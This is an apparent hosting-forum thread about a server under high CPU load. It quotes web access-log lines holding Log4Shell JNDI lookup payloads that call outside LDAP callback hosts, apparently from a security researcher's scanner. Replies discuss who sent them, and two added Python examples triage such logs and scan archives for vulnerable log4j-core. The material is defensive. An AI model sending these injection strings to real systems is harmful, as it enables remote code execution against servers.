194.5.73.6 - - [15/Dec/2021:15:36:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-9b3d222abc9923f7b0b6fbcacefc084f_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:15:36:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-9b3d222abc9923f7b0b6fbcacefc084f_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:18:51:57 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8cd4952dc1665f823d50c78d907e23d4_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:18:51:57 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8cd4952dc1665f823d50c78d907e23d4_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
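
Added example, not part of any post in this thread: a Python sketch that triages an access log like the one above, reporting which sources sent `${jndi:` lookups, in which request fields, how the server answered, and whether the first probe predates a given load onset. The log lines, addresses and `callback.example` are constructed, the function names are hypothetical, and the repeated percent-decoding goes slightly beyond the single-encoded lines shown in the thread.

```python
import re
from collections import Counter
from datetime import datetime, timezone
from urllib.parse import unquote

# Constructed sample (combined log format). Addresses are documentation ranges and
# "callback.example" is a placeholder; none of these values come from the thread.
SAMPLE_LOG = r'''
198.51.100.7 - - [14/Dec/2021:03:02:52 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fprobe-0001_%24%7Bdate%3AYYYYMMddHHmmss%7D_id.callback.example%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://probe-0001_${date:YYYYMMddHHmmss}_ua.callback.example/}"
198.51.100.7 - - [14/Dec/2021:07:46:01 +0000] "GET /?search=%2524%257Bjndi%253Aldap%253A%252F%252Fprobe-0002.callback.example%252F%257D HTTP/1.1" 400 891 "-" "curl/7.79.1"
203.0.113.20 - - [15/Dec/2021:10:43:40 +0000] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.20 - - [15/Dec/2021:10:43:41 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.55 - - [13/Dec/2021:02:35:22 +0000] "HEAD / HTTP/1.1" 200 0 "-" "-"
'''.strip()

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
FIELDS = ("request", "referer", "agent")


def decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def summarise(lines):
    """Return {source_ip: stats}; stats cover all requests and the JNDI probes."""
    report = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not combined log format, skip rather than guess
        entry = report.setdefault(m["ip"], {
            "requests": 0, "probes": 0, "first_probe": None, "last_probe": None,
            "statuses": Counter(), "fields": set(),
        })
        entry["requests"] += 1
        hit = {name for name in FIELDS if JNDI_RE.search(decode(m[name]))}
        if not hit:
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entry["probes"] += 1
        entry["fields"] |= hit
        entry["statuses"][m["status"]] += 1  # how the server answered the probes
        first, last = entry["first_probe"], entry["last_probe"]
        entry["first_probe"] = when if first is None else min(first, when)
        entry["last_probe"] = when if last is None else max(last, when)
    return report


def sources_probing_before(report, onset):
    """Sources whose first probe is earlier than the time the load problem began."""
    return sorted(ip for ip, e in report.items()
                  if e["first_probe"] is not None and e["first_probe"] < onset)


if __name__ == "__main__":
    result = summarise(SAMPLE_LOG.splitlines())
    for ip, e in sorted(result.items()):
        print(ip, e["requests"], "requests,", e["probes"], "probes,",
              dict(e["statuses"]), sorted(e["fields"]), e["first_probe"])
    # Constructed onset: compare against when the load alerts actually started.
    print(sources_probing_before(result, datetime(2021, 12, 1, tzinfo=timezone.utc)))
```

A handful of probes that were all answered with 400 tells you the host was scanned, not that the scan explains a sustained load average; the per-source request counts are the number to compare against the CPU graphs.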
 
What about blocking 194.5.73.0/24 in CSF?
.. BTW, this IP seems to belong to a security company - www.divd.nl; maybe they are playing with your server?
 
> What about blocking 194.5.73.0/24 in CSF?
> .. BTW, this IP seems to belong to a security company - www.divd.nl; maybe they are playing with your server?

Could be they want an overview while they publish statistics about vulnerabilities.

I know one from that team; I just mailed, hopefully the mail address is still active (and I don't end up in spam..), then we'll know later.

EDIT: Uh, did you or someone on your box install or use this?
log4shell scanner or test? > https://github.com/DIVD-NL/NCSC-NL-log4shell

As I posted those links here in the DA forum: https://forum.directadmin.com/threa...is-an-enterprise-nightmare.65173/#post-339825
 
> Could be they want an overview while they publish statistics about vulnerabilities.
>
> I know one from that team; I just mailed, hopefully the mail address is still active (and I don't end up in spam..), then we'll know later.
>
> EDIT: Uh, did you or someone on your box install or use this?
> log4shell scanner or test? > https://github.com/DIVD-NL/NCSC-NL-log4shell

No idea about that! Could you please tell me how to scan my server for any unwanted script?
How do I check whether it has been installed on my server?
 
> No idea about that! Could you please tell me how to scan my server for any unwanted script?
> How do I check whether it has been installed on my server?

If it's your own server and only you are admin with the user rights to install, then their scripts are probably not on your server.
But someone could scan yours with scripts originating from them, or, as it looks like, from that IP of that box of theirs.

Sorry, I don't know more about it; I only did a quick search to help you.

You should know the software used on your box, hence those links; if you find software that is on those lists, then I advise the scans and more to prevent it, also updates, and ask those software vendors whether there are updates.

The main problem is very old, unsupported versions; read the thread on the DA forum. DA itself is OK.

Anyway, do you think these are the cause of the high CPU?

When did this start? In the logs you see dates for those scans; if the high CPU started before those scans, then they could not be the cause, I think!

If it is a VM, then also look for log4j in the VM vendor software, as some have problems with that! ;)
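
Added example, not from any poster in this thread: one way to check whether Log4j is present on a box at all, assuming Python 3 is available there. It walks a directory tree, opens every .jar/.war/.ear (including archives nested inside them) and reports log4j-core by its Maven metadata and by the JndiLookup class; the function names are hypothetical and the demo archives are constructed.

```python
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")


def inspect_archive(source, label, depth=0, max_depth=3):
    """Report log4j-core inside one archive, descending into nested archives."""
    findings = []
    try:
        with zipfile.ZipFile(source) as zf:
            names = sorted(zf.namelist())
            has_class, has_pom = JNDI_CLASS in names, POM_PROPS in names
            if has_class or has_pom:
                version = None
                if has_pom:
                    text = zf.read(POM_PROPS).decode("utf-8", "replace")
                    for row in text.splitlines():
                        if row.startswith("version="):
                            version = row.split("=", 1)[1].strip()
                findings.append({"path": label, "version": version,
                                 "jndi_lookup": has_class})
            if depth < max_depth:
                for name in names:
                    if name.lower().endswith(ARCHIVE_EXT):
                        inner = io.BytesIO(zf.read(name))
                        findings += inspect_archive(inner, f"{label}!/{name}",
                                                    depth + 1, max_depth)
    except (zipfile.BadZipFile, OSError, RuntimeError):
        pass  # unreadable, encrypted or not really a zip: nothing to report
    return findings


def scan_tree(root):
    """Scan every archive under root; paths in the result are relative to root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in sorted(files):
            if filename.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, filename)
                findings += inspect_archive(full, os.path.relpath(full, root))
    return sorted(findings, key=lambda item: item["path"])


def _archive_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def run_constructed_demo():
    """Build a throwaway tree of constructed archives and scan it."""
    props = "version=0.0.0-constructed\n"
    with_class = _archive_bytes({JNDI_CLASS: b"", POM_PROPS: props})
    without_class = _archive_bytes({POM_PROPS: props})  # lookup class stripped
    war = _archive_bytes({"WEB-INF/lib/log4j-core-demo.jar": without_class})
    unrelated = _archive_bytes({"com/example/App.class": b""})
    layout = {"app/lib/log4j-core-demo.jar": with_class,
              "app/service.war": war,
              "other/plain.jar": unrelated}
    with tempfile.TemporaryDirectory() as root:
        for rel, data in layout.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as handle:
                handle.write(data)
        return scan_tree(root)


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_constructed_demo()
    for item in results:
        print(item)
```

Run it with a directory argument to scan a real tree; any reported version still has to be compared against the advisory of the vendor that shipped the archive.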
 